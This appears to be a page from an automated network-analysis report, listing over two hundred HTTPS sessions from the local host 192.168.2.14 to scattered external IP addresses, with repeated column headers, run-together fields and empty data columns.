                                      11888192.168.2.1454722173.192.215.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11889192.168.2.1454938185.118.223.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11890192.168.2.143419060.162.194.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11891192.168.2.1443444176.90.19.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11892192.168.2.144986679.187.166.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11893192.168.2.143510071.38.145.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11894192.168.2.1457492183.50.101.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11895192.168.2.143589857.6.207.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11896192.168.2.144302066.22.51.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11897192.168.2.1442682120.211.70.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11898192.168.2.1437572135.19.156.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11899192.168.2.1438286103.170.28.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11900192.168.2.1438598223.109.184.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11901192.168.2.1435134111.148.232.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11902192.168.2.145885696.206.252.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11903192.168.2.1441670107.162.117.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11904192.168.2.1437496221.158.179.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11905192.168.2.144129812.105.28.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11906192.168.2.145005039.160.243.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11907192.168.2.145740483.43.208.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11908192.168.2.1457950190.12.114.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11909192.168.2.1446610137.10.66.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11910192.168.2.1449992187.116.89.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11911192.168.2.143699640.106.213.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11912192.168.2.1439726150.107.42.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11913192.168.2.143371695.8.14.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11914192.168.2.1439306188.59.13.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11915192.168.2.144257843.56.100.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11916192.168.2.144270236.158.30.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11917192.168.2.144450859.200.229.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11918192.168.2.145083090.241.97.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11919192.168.2.1444036208.249.46.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11920192.168.2.143594090.203.78.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11921192.168.2.145641436.160.198.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11922192.168.2.144390676.240.96.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11923192.168.2.145381874.243.222.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11924192.168.2.145680264.123.137.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11925192.168.2.1435252112.148.164.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11926192.168.2.1433470140.206.177.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11927192.168.2.1449026125.11.59.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11928192.168.2.145579438.82.124.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11929192.168.2.1435274113.96.149.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11930192.168.2.1442100183.236.201.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11931192.168.2.1459280174.181.165.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11932192.168.2.145429059.177.126.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11933192.168.2.1441154108.18.246.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11934192.168.2.1460068168.122.197.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11935192.168.2.1455380176.51.217.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11936192.168.2.1451272132.1.20.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11937192.168.2.1438374160.130.48.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11938192.168.2.1437192104.171.180.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11939192.168.2.1432940182.184.242.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11940192.168.2.145270081.158.232.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11941192.168.2.1439520121.224.101.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11942192.168.2.1439128149.141.159.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11943192.168.2.144377474.17.175.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11944192.168.2.144918672.222.230.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11945192.168.2.1453692151.9.7.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11946192.168.2.1436094173.76.33.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11947192.168.2.143644819.18.75.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11948192.168.2.144561241.85.208.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11949192.168.2.1433014177.79.178.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11950192.168.2.1452104162.244.100.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11951192.168.2.145426038.76.249.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11952192.168.2.1439406212.4.1.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11953192.168.2.144067619.170.254.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11954192.168.2.144346034.191.130.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11955192.168.2.1441104191.32.178.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11956192.168.2.1439000206.4.76.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11957192.168.2.144948013.74.188.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11958192.168.2.1460114174.172.14.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11959192.168.2.143644419.62.241.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11960192.168.2.1452856221.147.226.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11961192.168.2.145758892.80.5.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11962192.168.2.145580267.85.145.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11963192.168.2.1456238201.109.143.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11964192.168.2.144211881.150.134.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11965192.168.2.1437654180.251.108.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11966192.168.2.144367627.164.184.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11967192.168.2.1435724119.215.79.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11968192.168.2.143636654.146.50.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11969192.168.2.14514068.249.170.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11970192.168.2.1448542201.175.112.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11971192.168.2.1454146147.87.213.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11972192.168.2.145083043.7.42.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11973192.168.2.1442588201.249.78.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11974192.168.2.1459266160.201.138.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11975192.168.2.144801496.76.163.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11976192.168.2.1434344209.122.141.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11977192.168.2.1450250135.145.21.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11978192.168.2.144793662.206.19.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11979192.168.2.144632639.31.242.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11980192.168.2.144615840.132.254.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11981192.168.2.1456104100.140.97.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11982192.168.2.1455986212.48.187.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11983192.168.2.144283449.95.148.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11984192.168.2.1433760156.56.190.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11985192.168.2.143386499.229.91.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11986192.168.2.1455334107.82.36.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11987192.168.2.1434674223.17.164.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11988192.168.2.1436730186.153.131.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11989192.168.2.14497445.153.144.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11990192.168.2.1455068123.132.215.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11991192.168.2.1438438188.174.202.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11992192.168.2.145699813.102.174.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11993192.168.2.144357217.248.97.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11994192.168.2.143320087.122.103.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11995192.168.2.143565671.218.194.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11996192.168.2.145598872.218.241.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11997192.168.2.145221850.157.154.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11998192.168.2.144181879.27.64.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      11999192.168.2.1441698140.121.61.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12000192.168.2.1437272109.161.153.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12001192.168.2.145996625.243.142.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12002192.168.2.1459550112.64.76.228443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12003192.168.2.1444914187.232.118.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12004192.168.2.1448614195.27.103.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12005192.168.2.1457938130.151.170.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12006192.168.2.145266831.226.229.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12007192.168.2.1433010159.80.188.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12008192.168.2.1452054117.118.239.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12009192.168.2.144115846.24.80.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12010192.168.2.1451654167.189.9.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12011192.168.2.146014439.89.186.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12012192.168.2.1443872165.123.176.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12013192.168.2.143291057.10.245.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12014192.168.2.145954414.33.151.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12015192.168.2.1449260208.121.25.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12016192.168.2.1443454109.24.227.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12017192.168.2.145223483.32.58.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12018192.168.2.1433760192.4.156.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12019192.168.2.146024681.156.83.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12020192.168.2.1446738115.7.186.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12021192.168.2.14342649.214.208.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12022192.168.2.1455642161.64.81.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12023192.168.2.1438448151.155.70.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12024192.168.2.144100832.200.59.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12025192.168.2.144490618.45.10.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12026192.168.2.1439874158.41.167.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12027192.168.2.1435444176.205.26.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12028192.168.2.1437370113.241.109.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12029192.168.2.143793418.196.73.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12030192.168.2.146080685.215.178.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12031192.168.2.144924472.161.100.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12032192.168.2.1439952110.14.186.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12033192.168.2.1440930216.214.174.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12034192.168.2.143697245.126.226.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12035192.168.2.1459838165.11.185.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12036192.168.2.143945444.115.47.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12037192.168.2.1446694126.154.215.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12038192.168.2.1456314125.173.219.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12039192.168.2.1453172141.102.250.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12040192.168.2.1445966142.137.93.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12041192.168.2.1442542126.104.151.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12042192.168.2.1448496114.19.75.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12043192.168.2.143730847.102.226.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12044192.168.2.1439004216.118.183.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12045192.168.2.1437100179.40.39.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12046192.168.2.1456016119.139.163.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12047192.168.2.145439424.192.194.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12048192.168.2.145419249.213.3.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12049192.168.2.1456696104.209.157.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12050192.168.2.1458784204.163.130.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12051192.168.2.144431684.61.98.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12052192.168.2.1456054204.195.222.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12053192.168.2.1442138111.129.227.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12054192.168.2.1438412139.122.237.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12055192.168.2.144341613.235.200.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12056192.168.2.14577628.216.196.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12057192.168.2.145282893.248.84.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12058192.168.2.1451152150.147.154.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12059192.168.2.1454478120.169.150.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12060192.168.2.144011040.72.8.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12061192.168.2.1450084155.101.66.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12062192.168.2.1457598172.97.207.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12063192.168.2.1459754139.218.169.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12064192.168.2.145659499.132.175.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12065192.168.2.145383250.83.233.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12066192.168.2.1440960207.228.131.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12067192.168.2.145003637.101.110.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12068192.168.2.1441026187.58.139.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12069192.168.2.145647862.197.30.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12070192.168.2.145155639.78.16.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12071192.168.2.1445950119.134.248.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12072192.168.2.1454366203.71.23.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12073192.168.2.1446566207.226.16.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12074192.168.2.1456604166.43.166.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12075192.168.2.1443920139.50.125.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12076192.168.2.1444318220.103.62.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12077192.168.2.1460690173.112.210.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12078192.168.2.1457394144.116.211.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12079192.168.2.1445064151.238.220.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12080192.168.2.144156635.76.68.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12081192.168.2.1435696205.21.105.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12082192.168.2.1440798177.217.161.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12083192.168.2.1452164205.250.141.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12084192.168.2.1449858101.204.67.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12085192.168.2.144024036.159.72.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12086192.168.2.1445060219.188.114.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12087192.168.2.1448044196.79.10.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12088192.168.2.143293042.203.126.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12089192.168.2.143678491.179.93.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12090192.168.2.145449019.222.39.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12091192.168.2.1459122137.254.114.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12092192.168.2.144007288.15.214.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12093192.168.2.145905014.152.148.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12094192.168.2.1453196156.120.201.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12095192.168.2.1439122196.58.230.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12096192.168.2.145868012.174.178.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12097192.168.2.1436848142.139.125.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12098192.168.2.1438096132.206.180.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12099192.168.2.1453842147.181.98.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12100192.168.2.144127648.186.16.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12101192.168.2.145397892.250.126.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12102192.168.2.144975467.156.203.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12103192.168.2.1451760207.183.128.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12104192.168.2.1454214161.158.12.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12105192.168.2.144519252.100.87.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12106192.168.2.1440374138.225.10.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12107192.168.2.1440718191.214.59.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12108192.168.2.145927244.184.95.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      12109192.168.2.1437442211.176.137.96443
                                      TimestampBytes transferredDirectionData


